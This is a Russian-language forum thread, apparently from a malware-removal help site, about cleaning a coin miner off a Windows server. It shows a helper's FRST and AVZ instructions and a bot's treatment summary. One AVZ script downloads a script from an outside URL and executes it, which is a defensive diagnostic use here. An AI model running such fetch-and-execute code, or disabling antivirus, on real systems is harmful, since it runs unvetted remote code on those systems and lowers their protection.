2018-01-18 19:51 - 2018-01-18 19:51 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-11.dmp
2018-01-18 17:39 - 2018-01-18 17:39 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-10.dmp
2018-01-18 14:11 - 2018-01-18 14:11 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-09.dmp
2018-01-18 13:54 - 2018-01-18 13:54 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-08.dmp
2018-01-18 13:49 - 2018-01-18 13:49 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-07.dmp
2018-01-18 11:43 - 2018-01-18 11:43 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-06.dmp
2018-01-18 10:33 - 2018-01-18 10:33 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-05.dmp
2018-01-18 07:34 - 2018-01-18 07:34 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-04.dmp
2018-01-18 04:55 - 2018-01-18 04:55 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-03.dmp
2018-01-18 02:40 - 2018-01-18 02:40 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-02.dmp
2018-01-18 01:45 - 2018-01-18 01:45 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-01.dmp
2018-01-17 18:23 - 2018-01-17 18:23 - 000065536 _____ C:\WINDOWS\Minidump\Mini011718-05.dmp
2018-01-17 18:10 - 2018-01-17 18:10 - 000065536 _____ C:\WINDOWS\Minidump\Mini011718-04.dmp
2018-01-17 14:38 - 2018-01-17 14:38 - 000065536 _____ C:\WINDOWS\Minidump\Mini011718-03.dmp
2018-01-17 12:24 - 2018-01-17 12:24 - 000065536 _____ C:\WINDOWS\Minidump\Mini011718-02.dmp
2018-01-17 11:59 - 2018-01-17 11:59 - 000065536 _____ C:\WINDOWS\Minidump\Mini011718-01.dmp
2018-01-16 18:35 - 2018-01-16 18:35 - 000065536 _____ C:\WINDOWS\Minidump\Mini011618-05.dmp
2018-01-16 16:07 - 2018-01-16 16:07 - 000065536 _____ C:\WINDOWS\Minidump\Mini011618-04.dmp
2018-01-16 08:38 - 2018-01-16 08:38 - 000065536 _____ C:\WINDOWS\Minidump\Mini011618-03.dmp
2018-01-16 07:51 - 2018-01-16 07:51 - 000065536 _____ C:\WINDOWS\Minidump\Mini011618-02.dmp
2018-01-16 02:42 - 2018-01-16 02:42 - 000065536 _____ C:\WINDOWS\Minidump\Mini011618-01.dmp
2018-01-15 18:36 - 2018-01-15 18:36 - 000065536 _____ C:\WINDOWS\Minidump\Mini011518-06.dmp
2018-01-15 17:50 - 2018-01-15 17:50 - 000065536 _____ C:\WINDOWS\Minidump\Mini011518-05.dmp
2018-01-15 12:22 - 2018-01-15 12:22 - 000065536 _____ C:\WINDOWS\Minidump\Mini011518-04.dmp
2018-01-15 12:04 - 2018-01-15 12:04 - 000065536 _____ C:\WINDOWS\Minidump\Mini011518-03.dmp
2018-01-15 08:28 - 2018-01-15 08:28 - 000065536 _____ C:\WINDOWS\Minidump\Mini011518-02.dmp
2018-01-15 08:24 - 2018-01-15 08:24 - 000065536 _____ C:\WINDOWS\Minidump\Mini011518-01.dmp
2018-01-14 21:13 - 2018-01-14 21:13 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-11.dmp
2018-01-14 20:39 - 2018-01-14 20:39 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-10.dmp
2018-01-14 20:35 - 2018-01-14 20:35 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-09.dmp
2018-01-14 19:24 - 2018-01-14 19:24 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-08.dmp
2018-01-14 16:26 - 2018-01-14 16:26 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-07.dmp
2018-01-14 16:15 - 2018-01-14 16:15 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-06.dmp
2018-01-14 15:48 - 2018-01-14 15:48 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-05.dmp
2018-01-14 12:35 - 2018-01-14 12:35 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-04.dmp
2018-01-14 12:16 - 2018-01-14 12:16 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-03.dmp
2018-01-14 04:51 - 2018-01-14 04:51 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-02.dmp
2018-01-14 04:25 - 2018-01-14 04:25 - 000065536 _____ C:\WINDOWS\Minidump\Mini011418-01.dmp
2018-01-13 20:01 - 2018-01-13 20:01 - 000065536 _____ C:\WINDOWS\Minidump\Mini011318-10.dmp
2018-01-13 18:30 - 2018-01-13 18:30 - 000065536 _____ C:\WINDOWS\Minidump\Mini011318-09.dmp
2018-01-13 12:02 - 2018-01-13 12:02 - 000065536 _____ C:\WINDOWS\Minidump\Mini011318-08.dmp
2018-01-13 09:36 - 2018-01-13 09:36 - 000065536 _____ C:\WINDOWS\Minidump\Mini011318-07.dmp
2018-01-13 09:26 - 2018-01-13 09:26 - 000065536 _____ C:\WINDOWS\Minidump\Mini011318-06.dmp
2018-01-13 08:01 - 2018-01-13 08:01 - 000065536 _____ C:\WINDOWS\Minidump\Mini011318-05.dmp
2018-01-13 07:50 - 2018-01-13 07:50 - 000065536 _____ C:\WINDOWS\Minidump\Mini011318-04.dmp
2018-01-13 04:12 - 2018-01-13 04:12 - 000065536 _____ C:\WINDOWS\Minidump\Mini011318-03.dmp
2018-01-13 03:01 - 2018-01-13 03:01 - 000065536 _____ C:\WINDOWS\Minidump\Mini011318-02.dmp
2018-01-13 02:56 - 2018-01-13 02:56 - 000065536 _____ C:\WINDOWS\Minidump\Mini011318-01.dmp
2018-01-12 22:22 - 2018-01-12 22:22 - 000065536 _____ C:\WINDOWS\Minidump\Mini011218-09.dmp
2018-01-12 22:14 - 2018-01-12 22:14 - 000065536 _____ C:\WINDOWS\Minidump\Mini011218-08.dmp
2018-01-12 21:35 - 2018-01-12 21:35 - 000065536 _____ C:\WINDOWS\Minidump\Mini011218-07.dmp
2018-01-12 20:10 - 2018-01-12 20:10 - 000065536 _____ C:\WINDOWS\Minidump\Mini011218-06.dmp
2018-01-12 20:04 - 2018-01-12 20:04 - 000065536 _____ C:\WINDOWS\Minidump\Mini011218-05.dmp
2018-01-12 16:14 - 2018-01-12 16:14 - 000065536 _____ C:\WINDOWS\Minidump\Mini011218-04.dmp
2018-01-12 11:02 - 2018-01-12 11:02 - 000065536 _____ C:\WINDOWS\Minidump\Mini011218-03.dmp
2018-01-12 09:54 - 2018-01-12 09:54 - 000065536 _____ C:\WINDOWS\Minidump\Mini011218-02.dmp
2018-01-12 08:28 - 2018-01-12 08:28 - 000065536 _____ C:\WINDOWS\Minidump\Mini011218-01.dmp
2018-01-11 22:31 - 2018-01-11 22:31 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-12.dmp
2018-01-11 21:41 - 2018-01-11 21:41 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-11.dmp
2018-01-11 21:31 - 2018-01-11 21:31 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-10.dmp
2018-01-11 21:26 - 2018-01-11 21:26 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-09.dmp
2018-01-11 21:18 - 2018-01-11 21:18 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-08.dmp
2018-01-11 13:55 - 2018-01-11 13:55 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-07.dmp
2018-01-11 11:09 - 2018-01-11 11:09 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-06.dmp
2018-01-11 10:02 - 2018-01-11 10:02 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-05.dmp
2018-01-11 07:47 - 2018-01-11 07:47 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-04.dmp
2018-01-11 06:33 - 2018-01-11 06:33 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-03.dmp
2018-01-11 06:28 - 2018-01-11 06:28 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-02.dmp
2018-01-11 06:10 - 2018-01-11 06:10 - 000065536 _____ C:\WINDOWS\Minidump\Mini011118-01.dmp
2018-01-10 17:01 - 2018-01-10 17:01 - 000065536 _____ C:\WINDOWS\Minidump\Mini011018-10.dmp
2018-01-10 16:04 - 2018-01-10 16:04 - 000065536 _____ C:\WINDOWS\Minidump\Mini011018-09.dmp
2018-01-10 14:25 - 2018-01-10 14:25 - 000065536 _____ C:\WINDOWS\Minidump\Mini011018-08.dmp
2018-01-10 14:00 - 2018-01-10 14:00 - 000065536 _____ C:\WINDOWS\Minidump\Mini011018-07.dmp
2018-01-10 04:52 - 2018-01-10 04:52 - 000065536 _____ C:\WINDOWS\Minidump\Mini011018-06.dmp
2018-01-10 04:05 - 2018-01-10 04:05 - 000065536 _____ C:\WINDOWS\Minidump\Mini011018-05.dmp
2018-01-10 03:50 - 2018-01-10 03:50 - 000065536 _____ C:\WINDOWS\Minidump\Mini011018-04.dmp
2018-01-10 03:45 - 2018-01-10 03:45 - 000065536 _____ C:\WINDOWS\Minidump\Mini011018-03.dmp
2018-01-10 00:13 - 2018-01-10 00:13 - 000065536 _____ C:\WINDOWS\Minidump\Mini011018-02.dmp
2018-01-10 00:01 - 2018-01-10 00:01 - 000065536 _____ C:\WINDOWS\Minidump\Mini011018-01.dmp
2018-01-09 23:53 - 2018-01-09 23:53 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-11.dmp
2018-01-09 23:47 - 2018-01-09 23:47 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-10.dmp
2018-01-09 23:39 - 2018-01-09 23:39 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-09.dmp
2018-01-09 23:30 - 2018-01-09 23:30 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-08.dmp
2018-01-09 19:00 - 2018-01-09 19:00 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-07.dmp
2018-01-09 16:52 - 2018-01-09 16:52 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-06.dmp
2018-01-09 13:08 - 2018-01-09 13:08 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-05.dmp
2018-01-09 12:50 - 2018-01-09 12:50 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-04.dmp
2018-01-09 10:30 - 2018-01-09 10:30 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-03.dmp
2018-01-09 09:34 - 2018-01-09 09:34 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-02.dmp
2018-01-09 09:27 - 2018-01-09 09:27 - 000065536 _____ C:\WINDOWS\Minidump\Mini010918-01.dmp
2018-01-09 08:52 - 2018-01-09 16:59 - 000667672 _____ C:\Documents and Settings\Administrator.MAIN-SERVER\My Documents\avz_sysinfo.htm
2018-01-09 08:52 - 2018-01-09 16:59 - 000311965 _____ C:\Documents and Settings\Administrator.MAIN-SERVER\My Documents\avz_sysinfo.xml
2018-01-05 23:17 - 2018-01-05 23:17 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-13.dmp
2018-01-05 22:09 - 2018-01-05 22:09 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-12.dmp
2018-01-05 20:40 - 2018-01-05 20:40 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-11.dmp
2018-01-05 20:31 - 2018-01-05 20:31 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-10.dmp
2018-01-05 20:25 - 2018-01-05 20:25 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-09.dmp
2018-01-05 20:01 - 2018-01-05 20:01 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-08.dmp
2018-01-05 17:33 - 2018-01-05 17:33 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-07.dmp
2018-01-05 17:04 - 2018-01-05 17:04 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-06.dmp
2018-01-05 16:56 - 2018-01-05 16:56 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-05.dmp
2018-01-05 14:02 - 2018-01-05 14:02 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-04.dmp
2018-01-05 11:53 - 2018-01-05 11:53 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-03.dmp
2018-01-05 10:57 - 2018-01-05 10:57 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-02.dmp
2018-01-05 10:53 - 2018-01-05 10:53 - 000065536 _____ C:\WINDOWS\Minidump\Mini010518-01.dmp
2018-01-04 22:30 - 2018-01-04 22:30 - 000065536 _____ C:\WINDOWS\Minidump\Mini010418-04.dmp
2018-01-04 19:50 - 2018-01-04 19:50 - 000065536 _____ C:\WINDOWS\Minidump\Mini010418-03.dmp
2018-01-04 19:43 - 2018-01-04 19:43 - 000065536 _____ C:\WINDOWS\Minidump\Mini010418-02.dmp
2018-01-04 18:11 - 2018-01-04 18:11 - 000065536 _____ C:\WINDOWS\Minidump\Mini010418-01.dmp
2018-01-03 22:48 - 2018-01-03 22:48 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-12.dmp
2018-01-03 22:13 - 2018-01-03 22:13 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-11.dmp
2018-01-03 19:58 - 2018-01-03 19:58 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-10.dmp
2018-01-03 19:51 - 2018-01-03 19:51 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-09.dmp
2018-01-03 19:47 - 2018-01-03 19:47 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-08.dmp
2018-01-03 18:38 - 2018-01-03 18:38 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-07.dmp
2018-01-03 17:49 - 2018-01-03 17:49 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-06.dmp
2018-01-03 17:31 - 2018-01-03 17:31 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-05.dmp
2018-01-03 17:26 - 2018-01-03 17:26 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-04.dmp
2018-01-03 17:18 - 2018-01-03 17:18 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-03.dmp
2018-01-03 12:54 - 2018-01-03 12:54 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-02.dmp
2018-01-03 11:06 - 2018-01-03 11:06 - 000065536 _____ C:\WINDOWS\Minidump\Mini010318-01.dmp

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Перезагрузите сервер.
Остатки зловреда зачистит, но IPsec не поможет восстановить. Какого именно файла не хватает?

Выполните скрипт в AVZ при наличии доступа в интернет:

Код:

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.

**VladZ** · 06.02.2018, 07:33

Лог файл FRST

**Vvvyg** · 06.02.2018, 21:14

А avz_log.txt?

Хвосты зловредов зачистили.

**VladZ** · 07.02.2018, 06:00

Спасибо, AVZ что то ругнулся насчет SP2.Не могу точно сказать. Спасибо огромное за помощь,дальше мы сами.Закрывайте тему. Низкий поклон.

**Vvvyg** · 07.02.2018, 06:59

После установки 2-го сервис-пака ещё раз скрипт запустите, выдаст ссылки на самые критичные патчи. А лучше обновите систему по полной.

Удалите папку C:\FRST со всем содержимым.

Выполните рекомендации после лечения.

**CyberHelper** · 07.02.2018, 07:09

Статистика проведенного лечения:

Получено карантинов: 1
Обработано файлов: 8
В ходе лечения вредоносные программы в карантинах не обнаружены

Win32/CoinMiner.DQ (заявка № 217379)

Опции темы